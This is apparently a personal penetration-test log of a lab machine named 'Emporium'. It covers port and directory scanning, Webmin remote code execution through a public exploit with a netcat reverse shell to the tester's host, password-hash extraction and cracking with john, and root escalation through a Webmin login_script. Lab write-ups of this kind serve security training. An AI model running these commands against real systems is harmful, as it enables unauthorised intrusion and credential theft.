🧪 Pentest Log: {{date:2025-08-23}}

🔍 Target Information

• Machine Name: Emporium
• IP Address: 192.168.217.223
• Operating System: Linux

ip=192.168.217.223

📡 Enumeration

🔌 Port Scanning

Command Used

ports=$(nmap -p- --min-rate=1000 -T4 $ip | grep '^[0-9]' | cut -d '/' -f 1 | tr '\n' ',' | sed s/,$//)

nmap -p$ports -sC -sV $ip -oN tcp_scan_result.txt

nmap -sU --top-ports 100 $ip -oN udp_scan_result.txt

Port 22

Port 80

Web Directory Scan

gobuster dir -u http://$ip -w /usr/share/seclists/Discovery/Web-Content/common.txt

dirsearch -u http://$ip -r -o dirsearch.txt

Found backup.zip

💣 Exploitation

📌 Vulnerability Summary

• Service / Port: 7080
• Vulnerability Type: RCE

🚀 Exploit Execution

🔧 Exploit Method

• Manual
• Public Exploit
• Custom Script

Tool / Script Used:

https://www.exploit-db.com/exploits/49556

        "path" : "/usr/bin/ncat -nv 192.168.45.163 10000 -e /bin/bash",
        
        
        
def loginReq(target, username, password, groupId):
    urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
    s = requests.Session()
    s.verify=False

python3 49556.py $ip:7080 admin Foster2020 shadow

python3 /home/kali/Documents/oscp/Shell\ Handler/penelope/penelope.py -p 10000

cat /etc/passwd

Obtain thor and root password hash

root:$6$XRJJB9j7GYzWvjBy$yZEsOS3cam1DG.eI26bW1TERw5SV7b3RVZQHZB7UFzKNyPR6PPUFfxzclKsiGUT8.WoL7vQ4hhNmekav68kwN1:19150:0:99999:7:::
thor:$6$l2ThCEsvmrzmkKIA$FWtAb1SsYFqAXA96Ze4uGTHtPV9HNi7ShAgoTet1gx.HvkEFePp.Bk/uBeuxpCMz/X3jXWbGavj11po9H/FzP.:19150:0:99999:7:::

Crack it using john

thor:valkyrie

🧬 Privilege Escalation

👤 Current Access

• User: thor
• Groups: 1000(thor)
• Shell Type: ssh

🔍 Enumeration

Sudo

sudo -l

Found

User thor may run the following commands on lite:
    (root) NOPASSWD: /usr/bin/systemctl restart webmin

🔓 Privilege Escalation Exploit

📌 Exploit Summary

• Technique Used: N/A
• Target Binary/Service: webmin
• Reference / Source: N/A

🔧 Exploit Steps

• Setup

vi /tmp/exploit.pl
chmod +x exploit.pl

python3 49556.py $ip:7080 admin Foster2020 bin

/usr/share/webmin/changepass.pl /etc/webmin root pwn

vi /etc/webmin/miniserv.conf

login_script=/tmp/exploit.pl

sudo /usr/bin/systemctl restart webmin

• Smash to root

login to webmin from website, catch the root shell

python3 /home/kali/Documents/oscp/Shell\ Handler/penelope/penelope.py -p 7080